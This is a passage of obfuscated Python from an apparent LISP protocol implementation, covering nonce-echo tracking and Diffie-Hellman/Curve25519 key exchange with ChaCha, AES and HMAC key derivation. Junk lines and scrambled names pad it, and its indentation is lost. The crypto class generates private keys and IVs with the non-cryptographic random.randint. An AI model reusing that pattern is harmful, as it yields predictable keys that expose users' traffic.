if 8 - 8: iIii1I11I1II1 . iIii1I11I1II1 + Ii1I . OOooOOo
iII , oooO0 = struct . unpack ( i1I1iii1I11II , packet [ : Iiiii ] )
if 58 - 58: iIii1I11I1II1 + I1Ii111 - I1ii11iIi11i - i1IIi * OoOoOO00
if 4 - 4: OoooooooOO
self . first_long = socket . ntohl ( iII )
self . second_long = socket . ntohl ( oooO0 )
self . k_bits = ( self . first_long & LISP_K_BITS ) >> 24
return ( True )
if 7 - 7: IiII
if 26 - 26: OOooOOo + Oo0Ooo
def key_id ( self , key_id ) :
self . first_long &= ~ ( 0x3 << 24 )
self . first_long |= ( ( key_id & 0x3 ) << 24 )
self . k_bits = key_id
if 71 - 71: I1IiiI . ooOoO0o
if 43 - 43: I1ii11iIi11i * OOooOOo
def nonce ( self , nonce ) :
self . first_long |= LISP_N_BIT
self . first_long |= nonce
if 1 - 1: OoO0O00 * ooOoO0o + IiII . oO0o / ooOoO0o
if 91 - 91: Ii1I + I11i - Oo0Ooo % OoOoOO00 . iII111i
def map_version ( self , version ) :
self . first_long |= LISP_V_BIT
self . first_long |= version
if 51 - 51: OOooOOo / I11i
if 51 - 51: ooOoO0o * oO0o - I1Ii111 + iII111i
def instance_id ( self , iid ) :
if ( iid == 0 ) : return
self . first_long |= LISP_I_BIT
self . second_long &= 0xff
self . second_long |= ( iid << 8 )
if 46 - 46: o0oOOo0O0Ooo - i11iIiiIii % OoO0O00 / Ii1I - OoOoOO00
if 88 - 88: oO0o * I1IiiI / OoO0O00 - OOooOOo / i1IIi . I1Ii111
def get_instance_id ( self ) :
return ( ( self . second_long >> 8 ) & 0xffffff )
if 26 - 26: i11iIiiIii - ooOoO0o
if 45 - 45: ooOoO0o + II111iiii % iII111i
def locator_status_bits ( self , lsbs ) :
self . first_long |= LISP_L_BIT
self . second_long &= 0xffffff00
self . second_long |= ( lsbs & 0xff )
if 55 - 55: ooOoO0o - oO0o % I1IiiI
if 61 - 61: ooOoO0o
def is_request_nonce ( self , nonce ) :
return ( nonce & 0x80000000 )
if 22 - 22: iIii1I11I1II1 / ooOoO0o / I1IiiI - o0oOOo0O0Ooo
if 21 - 21: oO0o . i11iIiiIii * I11i . OOooOOo / OOooOOo
def request_nonce ( self , nonce ) :
self . first_long |= LISP_E_BIT
self . first_long |= LISP_N_BIT
self . first_long |= ( nonce & 0xffffff )
if 42 - 42: OoooooooOO / I1Ii111 . o0oOOo0O0Ooo / O0 - IiII * IiII
if 1 - 1: Ii1I % I1Ii111
def is_e_bit_set ( self ) :
return ( self . first_long & LISP_E_BIT )
if 97 - 97: OoOoOO00
if 13 - 13: OoOoOO00 % OOooOOo . O0 / Oo0Ooo % Oo0Ooo
def get_nonce ( self ) :
return ( self . first_long & 0xffffff )
if 19 - 19: I1Ii111 % ooOoO0o - ooOoO0o % I1IiiI . OOooOOo - OoooooooOO
if 100 - 100: I1IiiI + Ii1I + o0oOOo0O0Ooo . i1IIi % OoooooooOO
if 64 - 64: O0 % i1IIi * I1Ii111 - Ii1I + Oo0Ooo
class lisp_echo_nonce ( ) :
def __init__ ( self , rloc_str ) :
self . rloc_str = rloc_str
self . rloc = lisp_address ( LISP_AFI_NONE , rloc_str , 0 , 0 )
self . request_nonce_sent = None
self . echo_nonce_sent = None
self . last_request_nonce_sent = None
self . last_new_request_nonce_sent = None
self . last_echo_nonce_sent = None
self . last_new_echo_nonce_sent = None
self . request_nonce_rcvd = None
self . echo_nonce_rcvd = None
self . last_request_nonce_rcvd = None
self . last_echo_nonce_rcvd = None
self . last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list [ rloc_str ] = self
if 65 - 65: OoOoOO00 . i11iIiiIii
if 36 - 36: oO0o * iII111i + IiII * iII111i . I1ii11iIi11i - iIii1I11I1II1
def send_ipc ( self , ipc_socket , ipc ) :
i1IIi1ii1i1ii = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
oo0OoO = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc ( ipc , i1IIi1ii1i1ii )
lisp_ipc ( ipc , ipc_socket , oo0OoO )
if 97 - 97: II111iiii
if 38 - 38: I1IiiI
def send_request_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
iiiii1i1 = "nonce%R%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , iiiii1i1 )
if 87 - 87: IiII - O0 + I1IiiI / OoooooooOO * iII111i / i1IIi
if 28 - 28: o0oOOo0O0Ooo - iII111i * I1ii11iIi11i - II111iiii % II111iiii - IiII
def send_echo_ipc ( self , ipc_socket , nonce ) :
nonce = lisp_hex_string ( nonce )
iiiii1i1 = "nonce%E%{}%{}" . format ( self . rloc_str , nonce )
self . send_ipc ( ipc_socket , iiiii1i1 )
if 76 - 76: I1Ii111
if 43 - 43: O0 / I1Ii111 . iIii1I11I1II1 - OoOoOO00
def receive_request ( self , ipc_socket , nonce ) :
iiII1iiI = self . request_nonce_rcvd
self . request_nonce_rcvd = nonce
self . last_request_nonce_rcvd = lisp_get_timestamp ( )
if ( lisp_i_am_rtr ) : return
if ( iiII1iiI != nonce ) : self . send_request_ipc ( ipc_socket , nonce )
if 57 - 57: i11iIiiIii - I11i / ooOoO0o / o0oOOo0O0Ooo * i11iIiiIii * o0oOOo0O0Ooo
if 28 - 28: OoooooooOO % O0 - OOooOOo / o0oOOo0O0Ooo / I1IiiI
def receive_echo ( self , ipc_socket , nonce ) :
if ( self . request_nonce_sent != nonce ) : return
self . last_echo_nonce_rcvd = lisp_get_timestamp ( )
if ( self . echo_nonce_rcvd == nonce ) : return
if 41 - 41: II111iiii * IiII / OoO0O00 . oO0o
self . echo_nonce_rcvd = nonce
if ( lisp_i_am_rtr ) : return
self . send_echo_ipc ( ipc_socket , nonce )
if 50 - 50: OoooooooOO + iIii1I11I1II1 / oO0o / OOooOOo . i11iIiiIii . ooOoO0o
if 75 - 75: iIii1I11I1II1 % ooOoO0o / OOooOOo - iII111i % i11iIiiIii
def get_request_or_echo_nonce ( self , ipc_socket , remote_rloc ) :
if 11 - 11: I11i . Ii1I
if 87 - 87: OOooOOo + OOooOOo
if 45 - 45: i1IIi - Oo0Ooo
if 87 - 87: OoOoOO00 - OoO0O00 * OoO0O00 / Ii1I . I11i * o0oOOo0O0Ooo
if 21 - 21: II111iiii
if ( self . request_nonce_sent and self . echo_nonce_sent and remote_rloc ) :
iI1iIiii111 = lisp_myrlocs [ 0 ] if remote_rloc . is_ipv4 ( ) else lisp_myrlocs [ 1 ]
if 27 - 27: iIii1I11I1II1 + oO0o % Oo0Ooo
if 99 - 99: iIii1I11I1II1 - Oo0Ooo / O0 / IiII
if ( remote_rloc . address > iI1iIiii111 . address ) :
OO0o = "exit"
self . request_nonce_sent = None
else :
OO0o = "stay in"
self . echo_nonce_sent = None
if 52 - 52: O0 + ooOoO0o
if 11 - 11: i1IIi / I1Ii111 * I1ii11iIi11i * I1Ii111 * ooOoO0o - i11iIiiIii
oOOoooo0o0 = bold ( "collision" , False )
I11iIi1i1I1i1 = red ( iI1iIiii111 . print_address_no_iid ( ) , False )
O0OOOO0o0O = red ( remote_rloc . print_address_no_iid ( ) , False )
lprint ( "Echo nonce {}, {} -> {}, {} request-nonce mode" . format ( oOOoooo0o0 ,
I11iIi1i1I1i1 , O0OOOO0o0O , OO0o ) )
if 76 - 76: OoO0O00 + OOooOOo - IiII . i1IIi
if 87 - 87: ooOoO0o + O0
if 69 - 69: iIii1I11I1II1 + i1IIi % II111iiii . OoO0O00 * oO0o * IiII
if 90 - 90: I1Ii111
if 62 - 62: II111iiii
if ( self . echo_nonce_sent != None ) :
Iii11I = self . echo_nonce_sent
oOo = bold ( "Echoing" , False )
lprint ( "{} nonce 0x{} to {}" . format ( oOo ,
lisp_hex_string ( Iii11I ) , red ( self . rloc_str , False ) ) )
self . last_echo_nonce_sent = lisp_get_timestamp ( )
self . echo_nonce_sent = None
return ( Iii11I )
if 60 - 60: i1IIi * II111iiii + Ii1I / I1Ii111 % OoOoOO00
if 100 - 100: iIii1I11I1II1 * i1IIi - i11iIiiIii - I1Ii111 % Ii1I
if 56 - 56: I11i
if 99 - 99: OoooooooOO % i1IIi % OoooooooOO . iII111i
if 20 - 20: OoO0O00 . oO0o
if 4 - 4: Oo0Ooo % Ii1I % OoO0O00 * iII111i % OoooooooOO
if 38 - 38: OoooooooOO . iII111i
Iii11I = self . request_nonce_sent
iiI = self . last_request_nonce_sent
if ( Iii11I and iiI != None ) :
if ( time . time ( ) - iiI >= LISP_NONCE_ECHO_INTERVAL ) :
self . request_nonce_sent = None
lprint ( "Stop request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( Iii11I ) ) )
if 44 - 44: I11i . IiII % I1Ii111 - ooOoO0o - I1ii11iIi11i
return ( None )
if 34 - 34: I1ii11iIi11i % i1IIi - OoO0O00
if 18 - 18: I1IiiI + I1Ii111 - iII111i % II111iiii / OoOoOO00 % O0
if 59 - 59: O0 . o0oOOo0O0Ooo % I1ii11iIi11i * oO0o + I11i
if 82 - 82: OoooooooOO
if 88 - 88: O0 / o0oOOo0O0Ooo * o0oOOo0O0Ooo . o0oOOo0O0Ooo . O0
if 27 - 27: i11iIiiIii % iII111i + Ii1I . OOooOOo
if 9 - 9: OoO0O00
if 43 - 43: Ii1I . OOooOOo + I1IiiI * i11iIiiIii
if 2 - 2: OOooOOo
if ( Iii11I == None ) :
Iii11I = lisp_get_data_nonce ( )
if ( self . recently_requested ( ) ) : return ( Iii11I )
if 3 - 3: I1IiiI . iII111i % O0 - ooOoO0o / O0
self . request_nonce_sent = Iii11I
lprint ( "Start request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( Iii11I ) ) )
if 79 - 79: Ii1I + oO0o % ooOoO0o % I1IiiI
self . last_new_request_nonce_sent = lisp_get_timestamp ( )
if 68 - 68: II111iiii - OoooooooOO / iIii1I11I1II1 - o0oOOo0O0Ooo % II111iiii
if 53 - 53: iII111i . oO0o / Oo0Ooo . OoO0O00 . i11iIiiIii
if 60 - 60: II111iiii
if 25 - 25: Oo0Ooo + o0oOOo0O0Ooo - OoO0O00
if 57 - 57: II111iiii . i1IIi
if ( lisp_i_am_itr == False ) : return ( Iii11I | 0x80000000 )
self . send_request_ipc ( ipc_socket , Iii11I )
else :
lprint ( "Continue request-nonce mode for {}, nonce 0x{}" . format ( red ( self . rloc_str , False ) , lisp_hex_string ( Iii11I ) ) )
if 33 - 33: iII111i + Oo0Ooo % I11i . oO0o
if 6 - 6: IiII + I1ii11iIi11i
if 62 - 62: oO0o . I1Ii111 - OoooooooOO * II111iiii . i11iIiiIii
if 13 - 13: iIii1I11I1II1 * o0oOOo0O0Ooo - i11iIiiIii
if 63 - 63: OoooooooOO * I1Ii111
if 50 - 50: Oo0Ooo - o0oOOo0O0Ooo % II111iiii . O0 . oO0o % II111iiii
if 18 - 18: I11i % OoooooooOO + OoO0O00 / I11i
self . last_request_nonce_sent = lisp_get_timestamp ( )
return ( Iii11I | 0x80000000 )
if 37 - 37: i1IIi - Ii1I / IiII . II111iiii % ooOoO0o
if 39 - 39: Ii1I % i11iIiiIii * OoO0O00
def request_nonce_timeout ( self ) :
if ( self . request_nonce_sent == None ) : return ( False )
if ( self . request_nonce_sent == self . echo_nonce_rcvd ) : return ( False )
if 23 - 23: OOooOOo + ooOoO0o / i11iIiiIii * Oo0Ooo . OoO0O00
oO000o0Oo00 = time . time ( ) - self . last_request_nonce_sent
i1I111II = self . last_echo_nonce_rcvd
return ( oO000o0Oo00 >= LISP_NONCE_ECHO_INTERVAL and i1I111II == None )
if 51 - 51: I1IiiI * ooOoO0o
if 47 - 47: OOooOOo . OOooOOo . IiII . I1Ii111 / i1IIi
def recently_requested ( self ) :
i1I111II = self . last_request_nonce_sent
if ( i1I111II == None ) : return ( False )
if 77 - 77: II111iiii % I11i / Oo0Ooo
oO000o0Oo00 = time . time ( ) - i1I111II
return ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL )
if 23 - 23: iIii1I11I1II1
if 10 - 10: I11i - o0oOOo0O0Ooo % OoooooooOO - I1ii11iIi11i
def recently_echoed ( self ) :
if ( self . request_nonce_sent == None ) : return ( True )
if 64 - 64: OoO0O00 / I1IiiI
if 23 - 23: I11i * I1Ii111 * o0oOOo0O0Ooo - I1IiiI % OoOoOO00 + o0oOOo0O0Ooo
if 41 - 41: IiII * OoooooooOO . ooOoO0o % i11iIiiIii
if 11 - 11: iIii1I11I1II1 . I1Ii111 - Oo0Ooo / I11i + II111iiii
i1I111II = self . last_good_echo_nonce_rcvd
if ( i1I111II == None ) : i1I111II = 0
oO000o0Oo00 = time . time ( ) - i1I111II
if ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL ) : return ( True )
if 29 - 29: I11i . i11iIiiIii + i1IIi - Ii1I + O0 . I1IiiI
if 8 - 8: o0oOOo0O0Ooo
if 78 - 78: i1IIi - Oo0Ooo
if 48 - 48: Ii1I - OoooooooOO + I1Ii111 % o0oOOo0O0Ooo - OoOoOO00 . I1IiiI
if 42 - 42: I1Ii111
if 70 - 70: o0oOOo0O0Ooo / I11i + oO0o % I1IiiI % Oo0Ooo + OoO0O00
i1I111II = self . last_new_request_nonce_sent
if ( i1I111II == None ) : i1I111II = 0
oO000o0Oo00 = time . time ( ) - i1I111II
return ( oO000o0Oo00 <= LISP_NONCE_ECHO_INTERVAL )
if 80 - 80: OOooOOo
if 12 - 12: Ii1I
def change_state ( self , rloc ) :
if ( rloc . up_state ( ) and self . recently_echoed ( ) == False ) :
i1Ii = bold ( "down" , False )
I1i = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
lprint ( "Take {} {}, last good echo: {}" . format ( red ( self . rloc_str , False ) , i1Ii , I1i ) )
if 16 - 16: I11i / OoooooooOO . i1IIi
rloc . state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc . last_state_change = lisp_get_timestamp ( )
return
if 90 - 90: o0oOOo0O0Ooo % I1ii11iIi11i / OoOoOO00
if 85 - 85: I1Ii111 - ooOoO0o - iII111i
if ( rloc . no_echoed_nonce_state ( ) == False ) : return
if 30 - 30: I1IiiI . Ii1I - Ii1I * i1IIi + I1Ii111 * I11i
if ( self . recently_requested ( ) == False ) :
oOOo = bold ( "up" , False )
lprint ( "Bring {} {}, retry request-nonce mode" . format ( red ( self . rloc_str , False ) , oOOo ) )
if 11 - 11: i11iIiiIii % o0oOOo0O0Ooo % ooOoO0o
rloc . state = LISP_RLOC_UP_STATE
rloc . last_state_change = lisp_get_timestamp ( )
if 59 - 59: II111iiii
if 58 - 58: OoOoOO00 % iII111i / I1ii11iIi11i + I1Ii111 - oO0o + iII111i
if 87 - 87: oO0o % I11i % Ii1I % IiII
def print_echo_nonce ( self ) :
I1I = lisp_print_elapsed ( self . last_request_nonce_sent )
OOo = lisp_print_elapsed ( self . last_good_echo_nonce_rcvd )
if 78 - 78: Ii1I - ooOoO0o * iIii1I11I1II1 * iII111i * Ii1I / Ii1I
IiIiIiIII1Iii = lisp_print_elapsed ( self . last_echo_nonce_sent )
OOoO = lisp_print_elapsed ( self . last_request_nonce_rcvd )
IiII1iiI = space ( 4 )
if 91 - 91: o0oOOo0O0Ooo * I1ii11iIi11i - iII111i . II111iiii
Oo0Ooo0O0 = "Nonce-Echoing:\n"
Oo0Ooo0O0 += ( "{}Last request-nonce sent: {}\n{}Last echo-nonce " + "received: {}\n" ) . format ( IiII1iiI , I1I , IiII1iiI , OOo )
if 1 - 1: OOooOOo + I1Ii111 * I1ii11iIi11i
Oo0Ooo0O0 += ( "{}Last request-nonce received: {}\n{}Last echo-nonce " + "sent: {}" ) . format ( IiII1iiI , OOoO , IiII1iiI , IiIiIiIII1Iii )
if 44 - 44: iII111i
if 79 - 79: o0oOOo0O0Ooo % OOooOOo . O0
return ( Oo0Ooo0O0 )
if 56 - 56: oO0o + i1IIi * iII111i - O0
if 84 - 84: iII111i % I1IiiI / iIii1I11I1II1 * Ii1I * iIii1I11I1II1 + I1ii11iIi11i
if 78 - 78: IiII / iII111i * Ii1I . OOooOOo . oO0o - I1Ii111
if 39 - 39: ooOoO0o . i1IIi + OoooooooOO . iII111i - i11iIiiIii % I1Ii111
if 38 - 38: oO0o
if 9 - 9: I11i . OoO0O00 . oO0o / OoooooooOO
if 59 - 59: iIii1I11I1II1 + i1IIi % II111iiii
if 2 - 2: II111iiii + I11i . OoO0O00
if 14 - 14: OOooOOo * I1IiiI - I1ii11iIi11i
class lisp_keys ( ) :
def __init__ ( self , key_id , do_curve = True , do_chacha = use_chacha ,
do_poly = use_poly ) :
self . uptime = lisp_get_timestamp ( )
self . last_rekey = None
self . rekey_count = 0
self . use_count = 0
self . key_id = key_id
self . cipher_suite = LISP_CS_1024
self . dh_g_value = LISP_CS_1024_G
self . dh_p_value = LISP_CS_1024_P
self . curve25519 = None
self . cipher_suite_string = ""
if ( do_curve ) :
if ( do_chacha ) :
self . cipher_suite = LISP_CS_25519_CHACHA
self . cipher_suite_string = "chacha"
elif ( os . getenv ( "LISP_USE_AES_GCM" ) != None ) :
self . cipher_suite = LISP_CS_25519_GCM
self . cipher_suite_string = "aes-gcm"
else :
self . cipher_suite = LISP_CS_25519_CBC
self . cipher_suite_string = "aes-cbc"
if 10 - 10: iII111i % I1Ii111 * I1ii11iIi11i * O0 * i11iIiiIii % I1Ii111
self . local_private_key = random . randint ( 0 , 2 ** 128 - 1 )
Oo000O000 = lisp_hex_string ( self . local_private_key ) . zfill ( 32 )
self . curve25519 = curve25519 . Private ( Oo000O000 )
else :
self . local_private_key = random . randint ( 0 , 0x1fff )
if 68 - 68: OoooooooOO * OoOoOO00
self . local_public_key = self . compute_public_key ( )
self . remote_public_key = None
self . shared_key = None
self . encrypt_key = None
self . icv_key = None
self . icv = poly1305 if do_poly else hashlib . sha256
self . iv = None
self . get_iv ( )
self . do_poly = do_poly
if 9 - 9: I1Ii111
if 36 - 36: I1Ii111 / OoOoOO00 + OoOoOO00 * ooOoO0o / OOooOOo * O0
def copy_keypair ( self , key ) :
self . local_private_key = key . local_private_key
self . local_public_key = key . local_public_key
self . curve25519 = key . curve25519
if 17 - 17: OoO0O00 / ooOoO0o % I1IiiI
if 47 - 47: Oo0Ooo * OoO0O00 / o0oOOo0O0Ooo * I1IiiI
def get_iv ( self ) :
if ( self . iv == None ) :
self . iv = random . randint ( 0 , LISP_16_128_MASK )
else :
self . iv += 1
if 60 - 60: I1ii11iIi11i / IiII . i11iIiiIii / OoO0O00 % II111iiii
iiI1iiIiiiI1I = self . iv
if ( self . cipher_suite == LISP_CS_25519_CHACHA ) :
iiI1iiIiiiI1I = struct . pack ( "Q" , iiI1iiIiiiI1I & LISP_8_64_MASK )
elif ( self . cipher_suite == LISP_CS_25519_GCM ) :
i1II111II1 = struct . pack ( "I" , ( iiI1iiIiiiI1I >> 64 ) & LISP_4_32_MASK )
I11I1iiI1 = struct . pack ( "Q" , iiI1iiIiiiI1I & LISP_8_64_MASK )
iiI1iiIiiiI1I = i1II111II1 + I11I1iiI1
else :
iiI1iiIiiiI1I = struct . pack ( "QQ" , iiI1iiIiiiI1I >> 64 , iiI1iiIiiiI1I & LISP_8_64_MASK )
return ( iiI1iiIiiiI1I )
if 18 - 18: OoOoOO00 % oO0o % OoO0O00 / iII111i
if 88 - 88: iII111i * OOooOOo / i11iIiiIii / i1IIi
def key_length ( self , key ) :
if ( type ( key ) != str ) : key = self . normalize_pub_key ( key )
return ( len ( key ) / 2 )
if 76 - 76: Ii1I . I11i - OOooOOo + OoOoOO00 * OoO0O00 % I1Ii111
if 24 - 24: iIii1I11I1II1 % Oo0Ooo % i11iIiiIii
def print_key ( self , key ) :
oOoOOoo = self . normalize_pub_key ( key )
return ( "0x{}...{}({})" . format ( oOoOOoo [ 0 : 4 ] , oOoOOoo [ - 4 : : ] , self . key_length ( oOoOOoo ) ) )
if 55 - 55: iII111i
if 19 - 19: OoooooooOO / OOooOOo * i11iIiiIii - I1IiiI
def normalize_pub_key ( self , key ) :
if ( type ( key ) == str ) :
if ( self . curve25519 ) : return ( binascii . hexlify ( key ) )
return ( key )
if 99 - 99: OoO0O00 % O0 . I1Ii111 - I1ii11iIi11i . Oo0Ooo / OoOoOO00
key = lisp_hex_string ( key ) . zfill ( 256 )
return ( key )
if 60 - 60: I1ii11iIi11i
if 78 - 78: oO0o + II111iiii
def print_keys ( self , do_bold = True ) :
I11iIi1i1I1i1 = bold ( "local-key: " , False ) if do_bold else "local-key: "
if ( self . local_public_key == None ) :
I11iIi1i1I1i1 += "none"
else :
I11iIi1i1I1i1 += self . print_key ( self . local_public_key )
if 55 - 55: OoooooooOO
O0OOOO0o0O = bold ( "remote-key: " , False ) if do_bold else "remote-key: "
if ( self . remote_public_key == None ) :
O0OOOO0o0O += "none"
else :
O0OOOO0o0O += self . print_key ( self . remote_public_key )
if 90 - 90: I1IiiI
III1I1Iii1 = "ECDH" if ( self . curve25519 ) else "DH"
IIIiIII1 = self . cipher_suite
return ( "{} cipher-suite: {}, {}, {}" . format ( III1I1Iii1 , IIIiIII1 , I11iIi1i1I1i1 , O0OOOO0o0O ) )
if 92 - 92: Oo0Ooo + IiII / Oo0Ooo + Ii1I / OOooOOo
if 3 - 3: Ii1I / O0 * ooOoO0o - OoOoOO00
def compare_keys ( self , keys ) :
if ( self . dh_g_value != keys . dh_g_value ) : return ( False )
if ( self . dh_p_value != keys . dh_p_value ) : return ( False )
if ( self . remote_public_key != keys . remote_public_key ) : return ( False )
return ( True )
if 54 - 54: oO0o . o0oOOo0O0Ooo * I11i
if 16 - 16: I1ii11iIi11i / I11i + o0oOOo0O0Ooo % i11iIiiIii % OOooOOo - Ii1I
def compute_public_key ( self ) :
if ( self . curve25519 ) : return ( self . curve25519 . get_public ( ) . public )
if 37 - 37: OOooOOo * Ii1I * I11i + OoOoOO00 / i11iIiiIii
Oo000O000 = self . local_private_key
i11ii = self . dh_g_value
oo00ooOOOo0O = self . dh_p_value
return ( int ( ( i11ii ** Oo000O000 ) % oo00ooOOOo0O ) )
if 19 - 19: OOooOOo * I11i
if 85 - 85: i1IIi % o0oOOo0O0Ooo * I1ii11iIi11i * OoO0O00 . II111iiii
def compute_shared_key ( self , ed , print_shared = False ) :
Oo000O000 = self . local_private_key
O000 = self . remote_public_key
if 18 - 18: ooOoO0o + I1Ii111 / OOooOOo / oO0o + iIii1I11I1II1 % IiII
oOoOO00Ooo = bold ( "Compute {} shared-key" . format ( ed ) , False )
lprint ( "{}, key-material: {}" . format ( oOoOO00Ooo , self . print_keys ( ) ) )
if 49 - 49: i1IIi % oO0o / OOooOOo . I1ii11iIi11i - I1Ii111
if ( self . curve25519 ) :
iiI1Iii = curve25519 . Public ( O000 )
self . shared_key = self . curve25519 . get_shared_key ( iiI1Iii )
else :
oo00ooOOOo0O = self . dh_p_value
self . shared_key = ( O000 ** Oo000O000 ) % oo00ooOOOo0O
if 84 - 84: I1IiiI / OoOoOO00
if 33 - 33: I11i . Oo0Ooo
if 89 - 89: iII111i + i1IIi - IiII + ooOoO0o . II111iiii
if 85 - 85: iIii1I11I1II1 - Ii1I * Oo0Ooo . oO0o + I1Ii111
if 13 - 13: O0 + iIii1I11I1II1 % II111iiii + iIii1I11I1II1
if 85 - 85: I1IiiI * iIii1I11I1II1 . iII111i / iII111i
if 43 - 43: I1IiiI
if ( print_shared ) :
oOoOOoo = self . print_key ( self . shared_key )
lprint ( "Computed shared-key: {}" . format ( oOoOOoo ) )
if 78 - 78: OoO0O00 % II111iiii + OoOoOO00 / I1IiiI
if 34 - 34: o0oOOo0O0Ooo % I1ii11iIi11i + Ii1I * I11i / oO0o
if 18 - 18: ooOoO0o
if 92 - 92: OoO0O00 % iIii1I11I1II1 / IiII * iII111i . i1IIi + oO0o
if 24 - 24: IiII . iII111i * IiII % i11iIiiIii . i11iIiiIii + i1IIi
self . compute_encrypt_icv_keys ( )
if 64 - 64: iIii1I11I1II1 / IiII / Oo0Ooo - I1ii11iIi11i
if 100 - 100: IiII + i1IIi * OoO0O00
if 64 - 64: oO0o * i11iIiiIii . Oo0Ooo
if 52 - 52: Oo0Ooo / ooOoO0o / iII111i - o0oOOo0O0Ooo / iII111i
self . rekey_count += 1
self . last_rekey = lisp_get_timestamp ( )
if 74 - 74: i1IIi . iIii1I11I1II1
if 85 - 85: I1IiiI
def compute_encrypt_icv_keys ( self ) :
ii = hashlib . sha256
if ( self . curve25519 ) :
i1I = self . shared_key
else :
i1I = lisp_hex_string ( self . shared_key )
if 3 - 3: OoOoOO00
if 52 - 52: OoOoOO00
if 79 - 79: I1IiiI + Oo0Ooo % OoOoOO00 - IiII + I1IiiI * oO0o
if 52 - 52: OoOoOO00 % I1ii11iIi11i * Oo0Ooo % OoooooooOO - OoO0O00
if 13 - 13: OOooOOo . Ii1I / I11i
I11iIi1i1I1i1 = self . local_public_key
if ( type ( I11iIi1i1I1i1 ) != long ) : I11iIi1i1I1i1 = int ( binascii . hexlify ( I11iIi1i1I1i1 ) , 16 )
O0OOOO0o0O = self . remote_public_key
if ( type ( O0OOOO0o0O ) != long ) : O0OOOO0o0O = int ( binascii . hexlify ( O0OOOO0o0O ) , 16 )
O00ooOOO00000 = "0001" + "lisp-crypto" + lisp_hex_string ( I11iIi1i1I1i1 ^ O0OOOO0o0O ) + "0100"
if 66 - 66: i1IIi - i1IIi - OOooOOo . I11i
IiIiIII11i1i = hmac . new ( O00ooOOO00000 , i1I , ii ) . hexdigest ( )
IiIiIII11i1i = int ( IiIiIII11i1i , 16 )
if 95 - 95: II111iiii / Ii1I % I11i - OoooooooOO
if 45 - 45: OoO0O00 * OoooooooOO / O0 . I1Ii111 / OoOoOO00
if 53 - 53: OoOoOO00 . I1IiiI * I1ii11iIi11i
if 56 - 56: iIii1I11I1II1 / Ii1I % Ii1I . Ii1I + o0oOOo0O0Ooo * OoooooooOO
oO00OOOO = ( IiIiIII11i1i >> 128 ) & LISP_16_128_MASK
IIIiIIi111 = IiIiIII11i1i & LISP_16_128_MASK
self . encrypt_key = lisp_hex_string ( oO00OOOO ) . zfill ( 32 )
oo0O0 = 32 if self . do_poly else 40
self . icv_key = lisp_hex_string ( IIIiIIi111 ) . zfill ( oo0O0 )
if 86 - 86: O0 . OoooooooOO * I11i / IiII
if 87 - 87: iIii1I11I1II1
def do_icv ( self , packet , nonce ) :
if ( self . icv_key == None ) : return ( "" )
if ( self . do_poly ) :
OOOooOO0oO = self . icv . poly1305aes
iIiIi1 = self . icv . binascii . hexlify
nonce = iIiIi1 ( nonce )
iii = OOOooOO0oO ( self . encrypt_key , self . icv_key , nonce , packet )
iii = iIiIi1 ( iii )
else :
Oo000O000 = binascii . unhexlify ( self . icv_key )
iii = hmac . new ( Oo000O000 , packet , self . icv ) . hexdigest ( )
iii = iii [ 0 : 40 ]
if 12 - 12: OoOoOO00 % OOooOOo + oO0o . O0 % iIii1I11I1II1
return ( iii )
if 41 - 41: OoooooooOO
if 13 - 13: I11i + I1Ii111 - I1Ii111 % oO0o / I11i
def add_key_by_nonce ( self , nonce ) :
if ( lisp_crypto_keys_by_nonce . has_key ( nonce ) == False ) :
lisp_crypto_keys_by_nonce [ nonce ] = [ None , None , None , None ]
if 4 - 4: I1IiiI + OOooOOo - IiII + iII111i
lisp_crypto_keys_by_nonce [ nonce ] [ self . key_id ] = self
if 78 - 78: Ii1I
if 29 - 29: II111iiii
def delete_key_by_nonce ( self , nonce ) :
if ( lisp_crypto_keys_by_nonce . has_key ( nonce ) == False ) : return
lisp_crypto_keys_by_nonce . pop ( nonce )
if 79 - 79: iIii1I11I1II1 - i11iIiiIii + ooOoO0o - II111iiii . iIii1I11I1II1
if 84 - 84: Oo0Ooo % I11i * O0 * I11i
def add_key_by_rloc ( self , addr_str , encap ) :
O0Oo = lisp_crypto_keys_by_rloc_encap if encap else lisp_crypto_keys_by_rloc_decap
if 70 - 70: O0 . iIii1I11I1II1 * II111iiii
if 43 - 43: Oo0Ooo / I1Ii111 / i1IIi
if ( O0Oo . has_key ( addr_str ) == False ) :
O0Oo [ addr_str ] = [ None , None , None , None ]
if 3 - 3: Ii1I * ooOoO0o . OoO0O00 * OoooooooOO + OoOoOO00 / O0
O0Oo [ addr_str ] [ self . key_id ] = self
if 60 - 60: I11i
if 97 - 97: i11iIiiIii * iIii1I11I1II1 / II111iiii
if 66 - 66: II111iiii + iII111i * oO0o % I11i / i1IIi / iIii1I11I1II1
if 62 - 62: OoOoOO00 + oO0o * IiII + O0 / OOooOOo + ooOoO0o
if 38 - 38: i1IIi / iIii1I11I1II1 + iII111i
if ( encap == False ) :
lisp_write_ipc_decap_key ( addr_str , O0Oo [ addr_str ] )
if 26 - 26: I1ii11iIi11i . Ii1I % o0oOOo0O0Ooo
if 4 - 4: I1Ii111
if 80 - 80: Oo0Ooo . O0 % o0oOOo0O0Ooo . o0oOOo0O0Ooo
def encode_lcaf ( self , rloc_addr ) :
OOoo000Ooo = self . normalize_pub_key ( self . local_public_key )
iiii1II = self . key_length ( OOoo000Ooo )
ii1iIiIIIII = ( 6 + iiii1II + 2 )
if ( rloc_addr != None ) : ii1iIiIIIII += rloc_addr . addr_length ( )
if 26 - 26: iIii1I11I1II1
IiiiIi1iiii11 = struct . pack ( "HBBBBHBB" , socket . htons ( LISP_AFI_LCAF ) , 0 , 0 ,
LISP_LCAF_SECURITY_TYPE , 0 , socket . htons ( ii1iIiIIIII ) , 1 , 0 )
if 1 - 1: IiII % i1IIi
if 41 - 41: OoO0O00 * OoO0O00 / iII111i + I1ii11iIi11i . o0oOOo0O0Ooo
